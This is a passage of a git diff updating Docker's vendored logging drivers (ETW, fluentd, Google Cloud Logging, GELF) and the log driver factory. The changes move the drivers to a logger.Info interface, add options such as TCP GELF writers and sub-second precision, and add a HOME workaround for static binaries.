stdoutLongLine && string(msg.Line) != stdoutTrailingLine { + t.Fatalf("Wrong Line: %q, expected 'stdoutLongLine' or 'stdoutTrailingLine'", msg.Line) + } + + if msg.PLogMetaData.ID == "" { + t.Fatalf("Expected partial metadata. Got nothing") + } + + if msg.PLogMetaData.Ordinal == 1 { + expectedPartID1 = msg.PLogMetaData.ID + expectedTS1 = msg.Timestamp + } else { + checkIdentical(t, msg, expectedPartID1, expectedTS1) + } + if msg.PLogMetaData.Ordinal == 4 && !msg.PLogMetaData.Last { + t.Fatalf("Last is not set for last chunk") + } + } + + if msg.Source == "stderr" { + if string(msg.Line) != stderrLongLine && string(msg.Line) != stderrTrailingLine { + t.Fatalf("Wrong Line: %q, expected 'stderrLongLine' or 'stderrTrailingLine'", msg.Line) + } + + if msg.PLogMetaData.ID == "" { + t.Fatalf("Expected partial metadata. Got nothing") + } + + if msg.PLogMetaData.Ordinal == 1 { + expectedPartID2 = msg.PLogMetaData.ID + expectedTS2 = msg.Timestamp + } else { + checkIdentical(t, msg, expectedPartID2, expectedTS2) + } + if msg.PLogMetaData.Ordinal == 4 && !msg.PLogMetaData.Last { + t.Fatalf("Last is not set for last chunk") + } + } + + if msg.Source == "normal" && msg.PLogMetaData != nil { + t.Fatalf("Normal messages should not have PartialLogMetaData") + } + recvMsgs++ + } + + if expectedMsgs != recvMsgs { + t.Fatalf("Expected msgs: %d Recv msgs: %d", expectedMsgs, recvMsgs) + } +} + type BenchmarkLoggerDummy struct { } -func (l *BenchmarkLoggerDummy) Log(m *Message) error { return nil } +func (l *BenchmarkLoggerDummy) Log(m *Message) error { PutMessage(m); return nil } func (l *BenchmarkLoggerDummy) Close() error { return nil } diff --git a/vendor/github.com/docker/docker/daemon/logger/etwlogs/etwlogs_windows.go b/vendor/github.com/docker/docker/daemon/logger/etwlogs/etwlogs_windows.go index f296d7f165..78d3477b61 100644 --- a/vendor/github.com/docker/docker/daemon/logger/etwlogs/etwlogs_windows.go +++ b/vendor/github.com/docker/docker/daemon/logger/etwlogs/etwlogs_windows.go 
@@ -10,17 +10,16 @@ // // Each container log message generates an ETW event that also contains: // the container name and ID, the timestamp, and the stream type. -package etwlogs +package etwlogs // import "github.com/docker/docker/daemon/logger/etwlogs" import ( "errors" "fmt" "sync" - "syscall" "unsafe" - "github.com/Sirupsen/logrus" "github.com/docker/docker/daemon/logger" + "github.com/sirupsen/logrus" "golang.org/x/sys/windows" ) @@ -42,41 +41,43 @@ var ( procEventWriteString = modAdvapi32.NewProc("EventWriteString") procEventUnregister = modAdvapi32.NewProc("EventUnregister") ) -var providerHandle syscall.Handle +var providerHandle windows.Handle var refCount int var mu sync.Mutex func init() { - providerHandle = syscall.InvalidHandle + providerHandle = windows.InvalidHandle if err := logger.RegisterLogDriver(name, New); err != nil { logrus.Fatal(err) } } // New creates a new etwLogs logger for the given container and registers the EWT provider. -func New(ctx logger.Context) (logger.Logger, error) { +func New(info logger.Info) (logger.Logger, error) { if err := registerETWProvider(); err != nil { return nil, err } - logrus.Debugf("logging driver etwLogs configured for container: %s.", ctx.ContainerID) + logrus.Debugf("logging driver etwLogs configured for container: %s.", info.ContainerID) return &etwLogs{ - containerName: fixContainerName(ctx.ContainerName), - imageName: ctx.ContainerImageName, - containerID: ctx.ContainerID, - imageID: ctx.ContainerImageID, + containerName: info.Name(), + imageName: info.ContainerImageName, + containerID: info.ContainerID, + imageID: info.ContainerImageID, }, nil } // Log logs the message to the ETW stream. func (etwLogger *etwLogs) Log(msg *logger.Message) error { - if providerHandle == syscall.InvalidHandle { + if providerHandle == windows.InvalidHandle { // This should never be hit, if it is, it indicates a programming error. 
errorMessage := "ETWLogs cannot log the message, because the event provider has not been registered." logrus.Error(errorMessage) return errors.New(errorMessage) } - return callEventWriteString(createLogMessage(etwLogger, msg)) + m := createLogMessage(etwLogger, msg) + logger.PutMessage(msg) + return callEventWriteString(m) } // Close closes the logger by unregistering the ETW provider. @@ -99,14 +100,6 @@ func createLogMessage(etwLogger *etwLogs, msg *logger.Message) string { msg.Line) } -// fixContainerName removes the initial '/' from the container name. -func fixContainerName(cntName string) string { - if len(cntName) > 0 && cntName[0] == '/' { - cntName = cntName[1:] - } - return cntName -} - func registerETWProvider() error { mu.Lock() defer mu.Unlock() @@ -127,7 +120,7 @@ func unregisterETWProvider() { if refCount == 1 { if callEventUnregister() { refCount-- - providerHandle = syscall.InvalidHandle + providerHandle = windows.InvalidHandle } // Not returning an error if EventUnregister fails, because etwLogs will continue to work } else { @@ -137,9 +130,11 @@ func unregisterETWProvider() { func callEventRegister() error { // The provider's GUID is {a3693192-9ed6-46d2-a981-f8226c8363bd} - guid := syscall.GUID{ - 0xa3693192, 0x9ed6, 0x46d2, - [8]byte{0xa9, 0x81, 0xf8, 0x22, 0x6c, 0x83, 0x63, 0xbd}, + guid := windows.GUID{ + Data1: 0xa3693192, + Data2: 0x9ed6, + Data3: 0x46d2, + Data4: [8]byte{0xa9, 0x81, 0xf8, 0x22, 0x6c, 0x83, 0x63, 0xbd}, } ret, _, _ := procEventRegister.Call(uintptr(unsafe.Pointer(&guid)), 0, 0, uintptr(unsafe.Pointer(&providerHandle))) @@ -152,7 +147,13 @@ func callEventRegister() error { } func callEventWriteString(message string) error { - ret, _, _ := procEventWriteString.Call(uintptr(providerHandle), 0, 0, uintptr(unsafe.Pointer(syscall.StringToUTF16Ptr(message)))) + utf16message, err := windows.UTF16FromString(message) + + if err != nil { + return err + } + + ret, _, _ := procEventWriteString.Call(uintptr(providerHandle), 0, 0, 
uintptr(unsafe.Pointer(&utf16message[0]))) if ret != win32CallSuccess { errorMessage := fmt.Sprintf("ETWLogs provider failed to log message. Error: %d", ret) logrus.Error(errorMessage) @@ -163,8 +164,5 @@ func callEventWriteString(message string) error { func callEventUnregister() bool { ret, _, _ := procEventUnregister.Call(uintptr(providerHandle)) - if ret != win32CallSuccess { - return false - } - return true + return ret == win32CallSuccess } diff --git a/vendor/github.com/docker/docker/daemon/logger/factory.go b/vendor/github.com/docker/docker/daemon/logger/factory.go index 9cf716b09a..84b54b2794 100644 --- a/vendor/github.com/docker/docker/daemon/logger/factory.go +++ b/vendor/github.com/docker/docker/daemon/logger/factory.go @@ -1,12 +1,18 @@ -package logger +package logger // import "github.com/docker/docker/daemon/logger" import ( "fmt" + "sort" "sync" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/pkg/plugingetter" + "github.com/docker/go-units" + "github.com/pkg/errors" ) // Creator builds a logging driver instance with given context. -type Creator func(Context) (Logger, error) +type Creator func(Info) (Logger, error) // LogOptValidator checks the options specific to the underlying // logging implementation. 
@@ -18,6 +24,22 @@ type logdriverFactory struct { m sync.Mutex } +func (lf *logdriverFactory) list() []string { + ls := make([]string, 0, len(lf.registry)) + lf.m.Lock() + for name := range lf.registry { + ls = append(ls, name) + } + lf.m.Unlock() + sort.Strings(ls) + return ls +} + +// ListDrivers gets the list of registered log driver names +func ListDrivers() []string { + return factory.list() +} + func (lf *logdriverFactory) register(name string, c Creator) error { if lf.driverRegistered(name) { return fmt.Errorf("logger: log driver named '%s' is already registered", name) @@ -33,6 +55,13 @@ func (lf *logdriverFactory) driverRegistered(name string) bool { lf.m.Lock() _, ok := lf.registry[name] lf.m.Unlock() + if !ok { + if pluginGetter != nil { // this can be nil when the init functions are running + if l, _ := getPlugin(name, plugingetter.Lookup); l != nil { + return true + } + } + } return ok } @@ -52,17 +81,19 @@ func (lf *logdriverFactory) get(name string) (Creator, error) { defer lf.m.Unlock() c, ok := lf.registry[name] - if !ok { - return c, fmt.Errorf("logger: no log driver named '%s' is registered", name) + if ok { + return c, nil } - return c, nil + + c, err := getPlugin(name, plugingetter.Acquire) + return c, errors.Wrapf(err, "logger: no log driver named '%s' is registered", name) } func (lf *logdriverFactory) getLogOptValidator(name string) LogOptValidator { lf.m.Lock() defer lf.m.Unlock() - c, _ := lf.optValidator[name] + c := lf.optValidator[name] return c } @@ -85,6 +116,11 @@ func GetLogDriver(name string) (Creator, error) { return factory.get(name) } +var builtInLogOpts = map[string]bool{ + "mode": true, + "max-buffer-size": true, +} + // ValidateLogOpts checks the options for the given log driver. The // options supported are specific to the LogDriver implementation. 
func ValidateLogOpts(name string, cfg map[string]string) error { @@ -92,13 +128,35 @@ func ValidateLogOpts(name string, cfg map[string]string) error { return nil } + switch containertypes.LogMode(cfg["mode"]) { + case containertypes.LogModeBlocking, containertypes.LogModeNonBlock, containertypes.LogModeUnset: + default: + return fmt.Errorf("logger: logging mode not supported: %s", cfg["mode"]) + } + + if s, ok := cfg["max-buffer-size"]; ok { + if containertypes.LogMode(cfg["mode"]) != containertypes.LogModeNonBlock { + return fmt.Errorf("logger: max-buffer-size option is only supported with 'mode=%s'", containertypes.LogModeNonBlock) + } + if _, err := units.RAMInBytes(s); err != nil { + return errors.Wrap(err, "error parsing option max-buffer-size") + } + } + if !factory.driverRegistered(name) { return fmt.Errorf("logger: no log driver named '%s' is registered", name) } + filteredOpts := make(map[string]string, len(builtInLogOpts)) + for k, v := range cfg { + if !builtInLogOpts[k] { + filteredOpts[k] = v + } + } + validator := factory.getLogOptValidator(name) if validator != nil { - return validator(cfg) + return validator(filteredOpts) } return nil } diff --git a/vendor/github.com/docker/docker/daemon/logger/fluentd/fluentd.go b/vendor/github.com/docker/docker/daemon/logger/fluentd/fluentd.go index a8303cf97b..907261f41f 100644 --- a/vendor/github.com/docker/docker/daemon/logger/fluentd/fluentd.go +++ b/vendor/github.com/docker/docker/daemon/logger/fluentd/fluentd.go @@ -1,6 +1,6 @@ // Package fluentd provides the log driver for forwarding server logs // to fluentd endpoints. 
-package fluentd +package fluentd // import "github.com/docker/docker/daemon/logger/fluentd" import ( "fmt" @@ -11,13 +11,13 @@ import ( "strings" "time" - "github.com/Sirupsen/logrus" "github.com/docker/docker/daemon/logger" "github.com/docker/docker/daemon/logger/loggerutils" "github.com/docker/docker/pkg/urlutil" "github.com/docker/go-units" "github.com/fluent/fluent-logger-golang/fluent" "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) type fluentd struct { @@ -48,11 +48,12 @@ const ( defaultRetryWait = 1000 defaultMaxRetries = math.MaxInt32 - addressKey = "fluentd-address" - bufferLimitKey = "fluentd-buffer-limit" - retryWaitKey = "fluentd-retry-wait" - maxRetriesKey = "fluentd-max-retries" - asyncConnectKey = "fluentd-async-connect" + addressKey = "fluentd-address" + bufferLimitKey = "fluentd-buffer-limit" + retryWaitKey = "fluentd-retry-wait" + maxRetriesKey = "fluentd-max-retries" + asyncConnectKey = "fluentd-async-connect" + subSecondPrecisionKey = "fluentd-sub-second-precision" ) func init() { @@ -67,22 +68,25 @@ func init() { // New creates a fluentd logger using the configuration passed in on // the context. The supported context configuration variable is // fluentd-address. 
-func New(ctx logger.Context) (logger.Logger, error) { - loc, err := parseAddress(ctx.Config[addressKey]) +func New(info logger.Info) (logger.Logger, error) { + loc, err := parseAddress(info.Config[addressKey]) if err != nil { return nil, err } - tag, err := loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate) + tag, err := loggerutils.ParseLogTag(info, loggerutils.DefaultTemplate) if err != nil { return nil, err } - extra := ctx.ExtraAttributes(nil) + extra, err := info.ExtraAttributes(nil) + if err != nil { + return nil, err + } bufferLimit := defaultBufferLimit - if ctx.Config[bufferLimitKey] != "" { - bl64, err := units.RAMInBytes(ctx.Config[bufferLimitKey]) + if info.Config[bufferLimitKey] != "" { + bl64, err := units.RAMInBytes(info.Config[bufferLimitKey]) if err != nil { return nil, err } @@ -90,8 +94,8 @@ func New(ctx logger.Context) (logger.Logger, error) { } retryWait := defaultRetryWait - if ctx.Config[retryWaitKey] != "" { - rwd, err := time.ParseDuration(ctx.Config[retryWaitKey]) + if info.Config[retryWaitKey] != "" { + rwd, err := time.ParseDuration(info.Config[retryWaitKey]) if err != nil { return nil, err } @@ -99,8 +103,8 @@ func New(ctx logger.Context) (logger.Logger, error) { } maxRetries := defaultMaxRetries - if ctx.Config[maxRetriesKey] != "" { - mr64, err := strconv.ParseUint(ctx.Config[maxRetriesKey], 10, strconv.IntSize) + if info.Config[maxRetriesKey] != "" { + mr64, err := strconv.ParseUint(info.Config[maxRetriesKey], 10, strconv.IntSize) if err != nil { return nil, err } @@ -108,24 +112,32 @@ func New(ctx logger.Context) (logger.Logger, error) { } asyncConnect := false - if ctx.Config[asyncConnectKey] != "" { - if asyncConnect, err = strconv.ParseBool(ctx.Config[asyncConnectKey]); err != nil { + if info.Config[asyncConnectKey] != "" { + if asyncConnect, err = strconv.ParseBool(info.Config[asyncConnectKey]); err != nil { + return nil, err + } + } + + subSecondPrecision := false + if info.Config[subSecondPrecisionKey] != "" { + if 
subSecondPrecision, err = strconv.ParseBool(info.Config[subSecondPrecisionKey]); err != nil { return nil, err } } fluentConfig := fluent.Config{ - FluentPort: loc.port, - FluentHost: loc.host, - FluentNetwork: loc.protocol, - FluentSocketPath: loc.path, - BufferLimit: bufferLimit, - RetryWait: retryWait, - MaxRetry: maxRetries, - AsyncConnect: asyncConnect, + FluentPort: loc.port, + FluentHost: loc.host, + FluentNetwork: loc.protocol, + FluentSocketPath: loc.path, + BufferLimit: bufferLimit, + RetryWait: retryWait, + MaxRetry: maxRetries, + AsyncConnect: asyncConnect, + SubSecondPrecision: subSecondPrecision, } - logrus.WithField("container", ctx.ContainerID).WithField("config", fluentConfig). + logrus.WithField("container", info.ContainerID).WithField("config", fluentConfig). Debug("logging driver fluentd configured") log, err := fluent.New(fluentConfig) @@ -134,8 +146,8 @@ func New(ctx logger.Context) (logger.Logger, error) { } return &fluentd{ tag: tag, - containerID: ctx.ContainerID, - containerName: ctx.ContainerName, + containerID: info.ContainerID, + containerName: info.ContainerName, writer: log, extra: extra, }, nil @@ -151,9 +163,15 @@ func (f *fluentd) Log(msg *logger.Message) error { for k, v := range f.extra { data[k] = v } + if msg.PLogMetaData != nil { + data["partial_message"] = "true" + } + + ts := msg.Timestamp + logger.PutMessage(msg) // fluent-logger-golang buffers logs from failures and disconnections, // and these are transferred again automatically. 
- return f.writer.PostWithTime(f.tag, msg.Timestamp, data) + return f.writer.PostWithTime(f.tag, ts, data) } func (f *fluentd) Close() error { @@ -169,6 +187,7 @@ func ValidateLogOpt(cfg map[string]string) error { for key := range cfg { switch key { case "env": + case "env-regex": case "labels": case "tag": case addressKey: @@ -176,17 +195,15 @@ func ValidateLogOpt(cfg map[string]string) error { case retryWaitKey: case maxRetriesKey: case asyncConnectKey: + case subSecondPrecisionKey: // Accepted default: return fmt.Errorf("unknown log opt '%s' for fluentd log driver", key) } } - if _, err := parseAddress(cfg["fluentd-address"]); err != nil { - return err - } - - return nil + _, err := parseAddress(cfg[addressKey]) + return err } func parseAddress(address string) (*location, error) { diff --git a/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging.go b/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging.go index 9a8c1c903f..1699f67a2d 100644 --- a/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging.go +++ b/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging.go @@ -1,6 +1,7 @@ -package gcplogs +package gcplogs // import "github.com/docker/docker/daemon/logger/gcplogs" import ( + "context" "fmt" "sync" "sync/atomic" @@ -8,22 +9,23 @@ import ( "github.com/docker/docker/daemon/logger" - "github.com/Sirupsen/logrus" - "golang.org/x/net/context" - "google.golang.org/cloud/compute/metadata" - "google.golang.org/cloud/logging" + "cloud.google.com/go/compute/metadata" + "cloud.google.com/go/logging" + "github.com/sirupsen/logrus" + mrpb "google.golang.org/genproto/googleapis/api/monitoredres" ) const ( name = "gcplogs" - projectOptKey = "gcp-project" - logLabelsKey = "labels" - logEnvKey = "env" - logCmdKey = "gcp-log-cmd" - logZoneKey = "gcp-meta-zone" - logNameKey = "gcp-meta-name" - logIDKey = "gcp-meta-id" + projectOptKey = "gcp-project" + logLabelsKey = "labels" + logEnvKey = "env" + logEnvRegexKey = "env-regex" + 
logCmdKey = "gcp-log-cmd" + logZoneKey = "gcp-meta-zone" + logNameKey = "gcp-meta-name" + logIDKey = "gcp-meta-id" ) var ( @@ -51,7 +53,7 @@ func init() { } type gcplogs struct { - client *logging.Client + logger *logging.Logger instance *instanceInfo container *containerInfo } @@ -59,7 +61,7 @@ type gcplogs struct { type dockerLogEntry struct { Instance *instanceInfo `json:"instance,omitempty"` Container *containerInfo `json:"container,omitempty"` - Data string `json:"data,omitempty"` + Message string `json:"message,omitempty"` } type instanceInfo struct { @@ -87,7 +89,7 @@ func initGCP() { // These will fail on instances if the metadata service is // down or the client is compiled with an API version that // has been removed. Since these are not vital, let's ignore - // them and make their fields in the dockeLogEntry ,omitempty + // them and make their fields in the dockerLogEntry ,omitempty projectID, _ = metadata.ProjectID() zone, _ = metadata.Zone() instanceName, _ = metadata.InstanceName() @@ -100,68 +102,104 @@ func initGCP() { // default credentials. // // See https://developers.google.com/identity/protocols/application-default-credentials -func New(ctx logger.Context) (logger.Logger, error) { +func New(info logger.Info) (logger.Logger, error) { initGCP() var project string if projectID != "" { project = projectID } - if projectID, found := ctx.Config[projectOptKey]; found { + if projectID, found := info.Config[projectOptKey]; found { project = projectID } if project == "" { - return nil, fmt.Errorf("No project was specified and couldn't read project from the meatadata server. Please specify a project") + return nil, fmt.Errorf("No project was specified and couldn't read project from the metadata server. 
Please specify a project") } - c, err := logging.NewClient(context.Background(), project, "gcplogs-docker-driver") + // Issue #29344: gcplogs segfaults (static binary) + // If HOME is not set, logging.NewClient() will call os/user.Current() via oauth2/google. + // However, in static binary, os/user.Current() leads to segfault due to a glibc issue that won't be fixed + // in a short term. (golang/go#13470, https://sourceware.org/bugzilla/show_bug.cgi?id=19341) + // So we forcibly set HOME so as to avoid call to os/user/Current() + if err := ensureHomeIfIAmStatic(); err != nil { + return nil, err + } + + c, err := logging.NewClient(context.Background(), project) if err != nil { return nil, err } + var instanceResource *instanceInfo + if onGCE { + instanceResource = &instanceInfo{ + Zone: zone, + Name: instanceName, + ID: instanceID, + } + } else if info.Config[logZoneKey] != "" || info.Config[logNameKey] != "" || info.Config[logIDKey] != "" { + instanceResource = &instanceInfo{ + Zone: info.Config[logZoneKey], + Name: info.Config[logNameKey], + ID: info.Config[logIDKey], + } + } - if err := c.Ping(); err != nil { + options := []logging.LoggerOption{} + if instanceResource != nil { + vmMrpb := logging.CommonResource( + &mrpb.MonitoredResource{ + Type: "gce_instance", + Labels: map[string]string{ + "instance_id": instanceResource.ID, + "zone": instanceResource.Zone, + }, + }, + ) + options = []logging.LoggerOption{vmMrpb} + } + lg := c.Logger("gcplogs-docker-driver", options...) 
+ + if err := c.Ping(context.Background()); err != nil { return nil, fmt.Errorf("unable to connect or authenticate with Google Cloud Logging: %v", err) } + extraAttributes, err := info.ExtraAttributes(nil) + if err != nil { + return nil, err + } + l := &gcplogs{ - client: c, + logger: lg, container: &containerInfo{ - Name: ctx.ContainerName, - ID: ctx.ContainerID, - ImageName: ctx.ContainerImageName, - ImageID: ctx.ContainerImageID, - Created: ctx.ContainerCreated, - Metadata: ctx.ExtraAttributes(nil), + Name: info.ContainerName, + ID: info.ContainerID, + ImageName: info.ContainerImageName, + ImageID: info.ContainerImageID, + Created: info.ContainerCreated, + Metadata: extraAttributes, }, } - if ctx.Config[logCmdKey] == "true" { - l.container.Command = ctx.Command() + if info.Config[logCmdKey] == "true" { + l.container.Command = info.Command() } - if onGCE { - l.instance = &instanceInfo{ - Zone: zone, - Name: instanceName, - ID: instanceID, - } - } else if ctx.Config[logZoneKey] != "" || ctx.Config[logNameKey] != "" || ctx.Config[logIDKey] != "" { - l.instance = &instanceInfo{ - Zone: ctx.Config[logZoneKey], - Name: ctx.Config[logNameKey], - ID: ctx.Config[logIDKey], - } + if instanceResource != nil { + l.instance = instanceResource } // The logger "overflows" at a rate of 10,000 logs per second and this // overflow func is called. We want to surface the error to the user // without overly spamming /var/log/docker.log so we log the first time // we overflow and every 1000th time after. 
- c.Overflow = func(_ *logging.Client, _ logging.Entry) error { - if i := atomic.AddUint64(&droppedLogs, 1); i%1000 == 1 { - logrus.Errorf("gcplogs driver has dropped %v logs", i) + c.OnError = func(err error) { + if err == logging.ErrOverflow { + if i := atomic.AddUint64(&droppedLogs, 1); i%1000 == 1 { + logrus.Errorf("gcplogs driver has dropped %v logs", i) + } + } else { + logrus.Error(err) } - return nil } return l, nil @@ -172,7 +210,7 @@ func New(ctx logger.Context) (logger.Logger, error) { func ValidateLogOpts(cfg map[string]string) error { for k := range cfg { switch k { - case projectOptKey, logLabelsKey, logEnvKey, logCmdKey, logZoneKey, logNameKey, logIDKey: + case projectOptKey, logLabelsKey, logEnvKey, logEnvRegexKey, logCmdKey, logZoneKey, logNameKey, logIDKey: default: return fmt.Errorf("%q is not a valid option for the gcplogs driver", k) } @@ -181,18 +219,24 @@ func ValidateLogOpts(cfg map[string]string) error { } func (l *gcplogs) Log(m *logger.Message) error { - return l.client.Log(logging.Entry{ - Time: m.Timestamp, + message := string(m.Line) + ts := m.Timestamp + logger.PutMessage(m) + + l.logger.Log(logging.Entry{ + Timestamp: ts, Payload: &dockerLogEntry{ Instance: l.instance, Container: l.container, - Data: string(m.Line), + Message: message, }, }) + return nil } func (l *gcplogs) Close() error { - return l.client.Flush() + l.logger.Flush() + return nil } func (l *gcplogs) Name() string { diff --git a/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging_linux.go b/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging_linux.go new file mode 100644 index 0000000000..27f8ef32f5 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging_linux.go @@ -0,0 +1,29 @@ +package gcplogs // import "github.com/docker/docker/daemon/logger/gcplogs" + +import ( + "os" + + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/pkg/homedir" + "github.com/sirupsen/logrus" +) + +// 
ensureHomeIfIAmStatic ensure $HOME to be set if dockerversion.IAmStatic is "true". +// See issue #29344: gcplogs segfaults (static binary) +// If HOME is not set, logging.NewClient() will call os/user.Current() via oauth2/google. +// However, in static binary, os/user.Current() leads to segfault due to a glibc issue that won't be fixed +// in a short term. (golang/go#13470, https://sourceware.org/bugzilla/show_bug.cgi?id=19341) +// So we forcibly set HOME so as to avoid call to os/user/Current() +func ensureHomeIfIAmStatic() error { + // Note: dockerversion.IAmStatic and homedir.GetStatic() is only available for linux. + // So we need to use them in this gcplogging_linux.go rather than in gcplogging.go + if dockerversion.IAmStatic == "true" && os.Getenv("HOME") == "" { + home, err := homedir.GetStatic() + if err != nil { + return err + } + logrus.Warnf("gcplogs requires HOME to be set for static daemon binary. Forcibly setting HOME to %s.", home) + os.Setenv("HOME", home) + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging_others.go b/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging_others.go new file mode 100644 index 0000000000..10a2cdc8cd --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging_others.go @@ -0,0 +1,7 @@ +// +build !linux + +package gcplogs // import "github.com/docker/docker/daemon/logger/gcplogs" + +func ensureHomeIfIAmStatic() error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/logger/gelf/gelf.go b/vendor/github.com/docker/docker/daemon/logger/gelf/gelf.go index 95860ac083..e9c860406a 100644 --- a/vendor/github.com/docker/docker/daemon/logger/gelf/gelf.go +++ b/vendor/github.com/docker/docker/daemon/logger/gelf/gelf.go @@ -1,11 +1,8 @@ -// +build linux - // Package gelf provides the log driver for forwarding server logs to // endpoints that support the Graylog Extended Log Format. 
-package gelf +package gelf // import "github.com/docker/docker/daemon/logger/gelf" import ( - "bytes" "compress/flate" "encoding/json" "fmt" @@ -15,17 +12,17 @@ import ( "time" "github.com/Graylog2/go-gelf/gelf" - "github.com/Sirupsen/logrus" "github.com/docker/docker/daemon/logger" "github.com/docker/docker/daemon/logger/loggerutils" "github.com/docker/docker/pkg/urlutil" + "github.com/sirupsen/logrus" ) const name = "gelf" type gelfLogger struct { - writer *gelf.Writer - ctx logger.Context + writer gelf.Writer + info logger.Info hostname string rawExtra json.RawMessage } @@ -41,44 +38,46 @@ func init() { // New creates a gelf logger using the configuration passed in on the // context. The supported context configuration variable is gelf-address. -func New(ctx logger.Context) (logger.Logger, error) { +func New(info logger.Info) (logger.Logger, error) { // parse gelf address - address, err := parseAddress(ctx.Config["gelf-address"]) + address, err := parseAddress(info.Config["gelf-address"]) if err != nil { return nil, err } // collect extra data for GELF message - hostname, err := ctx.Hostname() + hostname, err := info.Hostname() if err != nil { return nil, fmt.Errorf("gelf: cannot access hostname to set source field") } - // remove trailing slash from container name - containerName := bytes.TrimLeft([]byte(ctx.ContainerName), "/") - // parse log tag - tag, err := loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate) + tag, err := loggerutils.ParseLogTag(info, loggerutils.DefaultTemplate) if err != nil { return nil, err } extra := map[string]interface{}{ - "_container_id": ctx.ContainerID, - "_container_name": string(containerName), - "_image_id": ctx.ContainerImageID, - "_image_name": ctx.ContainerImageName, - "_command": ctx.Command(), + "_container_id": info.ContainerID, + "_container_name": info.Name(), + "_image_id": info.ContainerImageID, + "_image_name": info.ContainerImageName, + "_command": info.Command(), "_tag": tag, - "_created": 
ctx.ContainerCreated, + "_created": info.ContainerCreated, } - extraAttrs := ctx.ExtraAttributes(func(key string) string { + extraAttrs, err := info.ExtraAttributes(func(key string) string { if key[0] == '_' { return key } return "_" + key }) + + if err != nil { + return nil, err + } + for k, v := range extraAttrs { extra[k] = v } @@ -88,13 +87,61 @@ func New(ctx logger.Context) (logger.Logger, error) { return nil, err } - // create new gelfWriter - gelfWriter, err := gelf.NewWriter(address) + var gelfWriter gelf.Writer + if address.Scheme == "udp" { + gelfWriter, err = newGELFUDPWriter(address.Host, info) + if err != nil { + return nil, err + } + } else if address.Scheme == "tcp" { + gelfWriter, err = newGELFTCPWriter(address.Host, info) + if err != nil { + return nil, err + } + } + + return &gelfLogger{ + writer: gelfWriter, + info: info, + hostname: hostname, + rawExtra: rawExtra, + }, nil +} + +// create new TCP gelfWriter +func newGELFTCPWriter(address string, info logger.Info) (gelf.Writer, error) { + gelfWriter, err := gelf.NewTCPWriter(address) + if err != nil { + return nil, fmt.Errorf("gelf: cannot connect to GELF endpoint: %s %v", address, err) + } + + if v, ok := info.Config["gelf-tcp-max-reconnect"]; ok { + i, err := strconv.Atoi(v) + if err != nil || i < 0 { + return nil, fmt.Errorf("gelf-tcp-max-reconnect must be a positive integer") + } + gelfWriter.MaxReconnect = i + } + + if v, ok := info.Config["gelf-tcp-reconnect-delay"]; ok { + i, err := strconv.Atoi(v) + if err != nil || i < 0 { + return nil, fmt.Errorf("gelf-tcp-reconnect-delay must be a positive integer") + } + gelfWriter.ReconnectDelay = time.Duration(i) + } + + return gelfWriter, nil +} + +// create new UDP gelfWriter +func newGELFUDPWriter(address string, info logger.Info) (gelf.Writer, error) { + gelfWriter, err := gelf.NewUDPWriter(address) if err != nil { return nil, fmt.Errorf("gelf: cannot connect to GELF endpoint: %s %v", address, err) } - if v, ok := 
ctx.Config["gelf-compression-type"]; ok { + if v, ok := info.Config["gelf-compression-type"]; ok { switch v { case "gzip": gelfWriter.CompressionType = gelf.CompressGzip @@ -107,7 +154,7 @@ func New(ctx logger.Context) (logger.Logger, error) { } } - if v, ok := ctx.Config["gelf-compression-level"]; ok { + if v, ok := info.Config["gelf-compression-level"]; ok { val, err := strconv.Atoi(v) if err != nil { return nil, fmt.Errorf("gelf: invalid compression level %s, err %v", v, err) @@ -115,12 +162,7 @@ func New(ctx logger.Context) (logger.Logger, error) { gelfWriter.CompressionLevel = val } - return &gelfLogger{ - writer: gelfWriter, - ctx: ctx, - hostname: hostname, - rawExtra: rawExtra, - }, nil + return gelfWriter, nil } func (s *gelfLogger) Log(msg *logger.Message) error { @@ -134,9 +176,10 @@ func (s *gelfLogger) Log(msg *logger.Message) error { Host: s.hostname, Short: string(msg.Line), TimeUnix: float64(msg.Timestamp.UnixNano()/int64(time.Millisecond)) / 1000.0, - Level: level, + Level: int32(level), RawExtra: s.rawExtra, } + logger.PutMessage(msg) if err := s.writer.WriteMessage(&m); err != nil { return fmt.Errorf("gelf: cannot send GELF message: %v", err) @@ -154,56 +197,72 @@ func (s *gelfLogger) Name() string { // ValidateLogOpt looks for gelf specific log option gelf-address. 
func ValidateLogOpt(cfg map[string]string) error { + address, err := parseAddress(cfg["gelf-address"]) + if err != nil { + return err + } + for key, val := range cfg { switch key { case "gelf-address": case "tag": case "labels": case "env": + case "env-regex": case "gelf-compression-level": + if address.Scheme != "udp" { + return fmt.Errorf("compression is only supported on UDP") + } i, err := strconv.Atoi(val) if err != nil || i < flate.DefaultCompression || i > flate.BestCompression { return fmt.Errorf("unknown value %q for log opt %q for gelf log driver", val, key) } case "gelf-compression-type": + if address.Scheme != "udp" { + return fmt.Errorf("compression is only supported on UDP") + } switch val { case "gzip", "zlib", "none": default: return fmt.Errorf("unknown value %q for log opt %q for gelf log driver", val, key) } + case "gelf-tcp-max-reconnect", "gelf-tcp-reconnect-delay": + if address.Scheme != "tcp" { + return fmt.Errorf("%q is only valid for TCP", key) + } + i, err := strconv.Atoi(val) + if err != nil || i < 0 { + return fmt.Errorf("%q must be a positive integer", key) + } default: return fmt.Errorf("unknown log opt %q for gelf log driver", key) } } - if _, err := parseAddress(cfg["gelf-address"]); err != nil { - return err - } - return nil } -func parseAddress(address string) (string, error) { +func parseAddress(address string) (*url.URL, error) { if address == "" { - return "", nil + return nil, fmt.Errorf("gelf-address is a required parameter") } if !urlutil.IsTransportURL(address) { - return "", fmt.Errorf("gelf-address should be in form proto://address, got %v", address) + return nil, 